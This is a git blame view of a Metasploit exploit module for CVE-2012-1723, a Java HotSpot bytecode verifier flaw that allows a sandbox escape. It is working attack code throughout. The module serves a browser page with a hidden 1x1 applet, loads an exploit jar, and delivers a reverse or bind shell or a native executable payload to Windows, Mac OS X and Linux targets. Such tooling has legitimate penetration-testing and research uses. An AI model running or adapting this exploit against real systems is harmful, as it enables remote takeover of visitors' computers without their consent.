Files
metasploit-gs/modules/exploits/multi/browser/java_verifier_field_access.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

178 lines
5.3 KiB
Ruby
Raw Normal View History

2012-07-10 12:20:37 +10:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2012-07-10 12:20:37 +10:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2012-07-10 00:37:07 -05:00
Rank = ExcellentRanking
2013-08-30 16:28:54 -05:00
2012-07-10 12:20:37 +10:00
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
2013-08-30 16:28:54 -05:00
2012-07-10 12:20:37 +10:00
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Java Applet Field Bytecode Verifier Cache Remote Code Execution',
'Description' => %q{
2012-07-10 12:20:37 +10:00
This module exploits a vulnerability in HotSpot bytecode verifier where an invalid
2025-06-20 13:20:44 +01:00
optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient
type checks. This allows a way to escape the JRE sandbox, and load additional classes
in order to perform malicious operations.
},
'License' => MSF_LICENSE,
'Author' => [
'Stefan Cornelius', # Discoverer
2012-07-10 00:37:07 -05:00
'mihi', # Vuln analysis
2012-07-10 12:20:37 +10:00
'littlelightlittlefire', # metasploit module
2012-07-10 00:43:46 -05:00
'juan vazquez', # merged code (overlapped)
'sinn3r' # merged code (overlapped)
2012-07-10 12:20:37 +10:00
],
2025-06-20 13:20:44 +01:00
'References' => [
2012-07-10 12:20:37 +10:00
['CVE', '2012-1723'],
['OSVDB', '82877'],
2012-07-10 00:37:07 -05:00
['BID', '52161'],
2012-07-10 12:20:37 +10:00
['URL', 'http://schierlm.users.sourceforge.net/CVE-2012-1723.html'],
2012-07-10 00:37:07 -05:00
['URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2012-1515912.html'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=829373'],
['URL', 'http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/253e7c32def9'],
['URL', 'http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/8f86ad60699b']
2012-07-10 12:20:37 +10:00
],
2025-06-20 13:20:44 +01:00
'Platform' => %w{java linux osx solaris win},
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' => [
[
'Generic (Java Payload)',
2012-07-10 12:20:37 +10:00
{
'Platform' => ['java'],
2012-07-10 00:37:07 -05:00
'Arch' => ARCH_JAVA
2012-07-10 12:20:37 +10:00
}
],
2025-06-20 13:20:44 +01:00
[
'Windows x86 (Native Payload)',
2012-07-10 12:20:37 +10:00
{
'Platform' => 'win',
2012-07-10 00:37:07 -05:00
'Arch' => ARCH_X86
2012-07-10 12:20:37 +10:00
}
],
2025-06-20 13:20:44 +01:00
[
'Mac OS X PPC (Native Payload)',
2012-07-10 12:20:37 +10:00
{
'Platform' => 'osx',
2012-07-10 00:37:07 -05:00
'Arch' => ARCH_PPC
2012-07-10 12:20:37 +10:00
}
],
2025-06-20 13:20:44 +01:00
[
'Mac OS X x86 (Native Payload)',
2012-07-10 12:20:37 +10:00
{
'Platform' => 'osx',
2012-07-10 00:37:07 -05:00
'Arch' => ARCH_X86
2012-07-10 12:20:37 +10:00
}
],
2025-06-20 13:20:44 +01:00
[
'Linux x86 (Native Payload)',
2012-07-10 12:20:37 +10:00
{
'Platform' => 'linux',
2012-07-10 00:37:07 -05:00
'Arch' => ARCH_X86
2012-07-10 12:20:37 +10:00
}
],
],
2025-06-20 13:20:44 +01:00
'DefaultTarget' => 0,
'DisclosureDate' => '2012-06-06',
'Notes' => {
2025-06-23 12:43:46 +01:00
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
'SideEffects' => UNKNOWN_SIDE_EFFECTS
}
2025-06-20 13:20:44 +01:00
)
)
2012-07-10 12:20:37 +10:00
end
2013-08-30 16:28:54 -05:00
2012-07-10 12:20:37 +10:00
def exploit
# load the static jar file
2025-06-20 13:20:44 +01:00
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2012-1723.jar")
fd = File.open(path, "rb")
2012-07-10 12:20:37 +10:00
@jar_data = fd.read(fd.stat.size)
fd.close
2013-08-30 16:28:54 -05:00
2012-07-10 12:20:37 +10:00
super
end
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
def on_request_uri(cli, request)
2012-07-10 12:20:37 +10:00
data = ""
host = ""
port = ""
2013-08-30 16:28:54 -05:00
2012-07-10 12:20:37 +10:00
if not request.uri.match(/\.jar$/i)
if not request.uri.match(/\/$/)
2025-06-20 13:20:44 +01:00
send_redirect(cli, get_resource() + '/', '')
2012-07-10 12:20:37 +10:00
return
end
2013-08-30 16:28:54 -05:00
2012-07-10 12:20:37 +10:00
print_status("Sending #{self.name}")
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
payload = regenerate_payload(cli)
2012-07-10 12:20:37 +10:00
if not payload
2025-06-20 13:20:44 +01:00
print_error("Failed to generate the payload.")
2012-07-10 12:20:37 +10:00
return
end
2013-08-30 16:28:54 -05:00
2012-07-10 12:20:37 +10:00
if target.name == 'Generic (Java Payload)'
if datastore['LHOST']
2025-06-20 13:20:44 +01:00
jar = payload.encoded
2012-07-10 12:20:37 +10:00
host = datastore['LHOST']
port = datastore['LPORT']
vprint_status("Sending java reverse shell")
else
port = datastore['LPORT']
host = cli.peerhost
2025-06-20 13:20:44 +01:00
vprint_status("Java bind shell")
2012-07-10 12:20:37 +10:00
end
if jar
2025-06-20 13:20:44 +01:00
print_status("Generated jar to drop (#{jar.length} bytes).")
jar = Rex::Text.to_hex(jar, prefix = "")
2012-07-10 12:20:37 +10:00
else
2025-06-20 13:20:44 +01:00
print_error("Failed to generate the executable.")
2012-07-10 12:20:37 +10:00
return
end
else
2013-08-30 16:28:54 -05:00
2012-07-10 12:20:37 +10:00
# NOTE: The EXE mixin automagically handles detection of arch/platform
data = generate_payload_exe
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
print_status("Generated executable to drop (#{data.length} bytes).")
data = Rex::Text.to_hex(data, prefix = "")
2013-08-30 16:28:54 -05:00
2012-07-10 12:20:37 +10:00
end
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
send_response_html(cli, generate_html(data, jar, host, port), { 'Content-Type' => 'text/html' })
2012-07-10 12:20:37 +10:00
return
end
2013-08-30 16:28:54 -05:00
2012-07-10 12:20:37 +10:00
print_status("Sending jar")
2025-06-20 13:20:44 +01:00
send_response(cli, generate_jar(), { 'Content-Type' => "application/octet-stream" })
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
handler(cli)
2012-07-10 12:20:37 +10:00
end
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
def generate_html(data, jar, host, port)
jar_name = rand_text_alpha(rand(6) + 3) + ".jar"
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
html = "<html><head></head>"
2012-07-10 12:20:37 +10:00
html += "<body>"
html += "<applet archive=\"#{jar_name}\" code=\"cve1723.Attacker\" width=\"1\" height=\"1\">"
html += "<param name=\"data\" value=\"#{data}\"/>" if data
html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar
html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
html += "</applet></body></html>"
return html
end
2013-08-30 16:28:54 -05:00
2012-07-10 12:20:37 +10:00
def generate_jar()
2012-07-10 00:37:07 -05:00
@jar_data
2012-07-10 12:20:37 +10:00
end
end